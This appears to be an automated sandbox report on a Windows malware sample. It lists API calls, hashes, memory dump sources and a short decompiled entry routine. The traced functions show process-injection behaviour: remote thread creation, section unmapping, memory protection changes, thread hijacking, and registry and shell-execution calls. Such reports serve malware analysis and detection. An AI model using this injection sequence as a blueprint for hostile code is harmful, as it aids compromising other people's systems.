ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
GetLastError.KERNEL32 ref: 004010A4
Sleep.KERNELBASE(00000064), ref: 004010B7
CloseHandle.KERNEL32(?), ref: 004010CE

Strings

\\.\mailslot\msl0, xrefs: 00401047

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file

Similarity

Total matches: 194
API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
String ID:
API String ID: 1233022807-0
Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca

APIs

CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
GetLastError.KERNEL32(?,002E7494), ref: 002E16F3

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection

Similarity

Total matches: 307
API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 307323562-0
Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed

APIs

memset.NTDLL ref: 002E22F5

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

ResumeThread.KERNELBASE(?), ref: 002E2418

Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81

ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
SuspendThread.KERNELBASE(?), ref: 002E23A1

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection

Similarity

Total matches: 154
API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
String ID:
API String ID: 2418253885-0
Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65

APIs

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE

Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418

CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
CloseHandle.KERNEL32(?), ref: 002E24E0
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader

Similarity

Total matches: 223
API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
String ID:
API String ID: 2525968537-0
Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393

APIs

GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization

Similarity

Total matches: 294
API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
String ID:
API String ID: 748258982-0
Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6

APIs

RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D

RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file

Similarity

Total matches: 385
API ID: CloseHandleCreateFileReadFileSetFilePointer
String ID:
API String ID: 3466452087-0
Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722

APIs

Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7

Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
CloseHandle.KERNEL32(?), ref: 002E3400

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141
memorythread

Similarity

Total matches: 141
API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
String ID:
API String ID: 1629895477-0
Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc

C-Code - Quality: 100%

			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00401003
HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
GetLastError.KERNEL32 ref: 00401026
ExitThread.KERNEL32 ref: 0040102D

Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory

Similarity

Total matches: 157
API ID: HeapFree
String ID: Local\
API String ID: 2968971433-422136742
Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a

APIs

Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610

Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE

HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217

Strings

Local\, xrefs: 002E11CD, 002E11D2, 002E11F7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime

Similarity

Total matches: 218
API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
String ID:
API String ID: 1809591024-0
Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9

APIs

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
lstrcpy.KERNEL32(00000000), ref: 002E4BE0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305

Similarity

Total matches: 305
API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
String ID:
API String ID: 4193297829-0
Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string

Similarity

Total matches: 183
API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
String ID: <
API String ID: 1457465641-4251816714
Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85

APIs

memset.NTDLL ref: 002E2CEE
CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

wsprintfW.USER32 ref: 002E2DAE
ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
CoUninitialize.OLE32 ref: 002E2DF7

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Strings

<, xrefs: 002E2DC2

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file

Similarity

Total matches: 320
API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
String ID:
API String ID: 3756146440-0
Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0

APIs

CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
CloseHandle.KERNEL32(00000000), ref: 002E4B65

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file

Similarity

Total matches: 377
API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
String ID:
API String ID: 1827773359-0
Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
CloseHandle.KERNEL32(000000FF), ref: 002E4AF0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection

Similarity

Total matches: 388
API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 4069891769-0
Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e

APIs

memset.NTDLL ref: 002E21A3

Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036

ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409

Similarity

Total matches: 409
API ID: GetLastError$memcpymemset
String ID:
API String ID: 1724464136-0
Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215

APIs

memset.NTDLL ref: 002E3750
memcpy.NTDLL ref: 002E3778

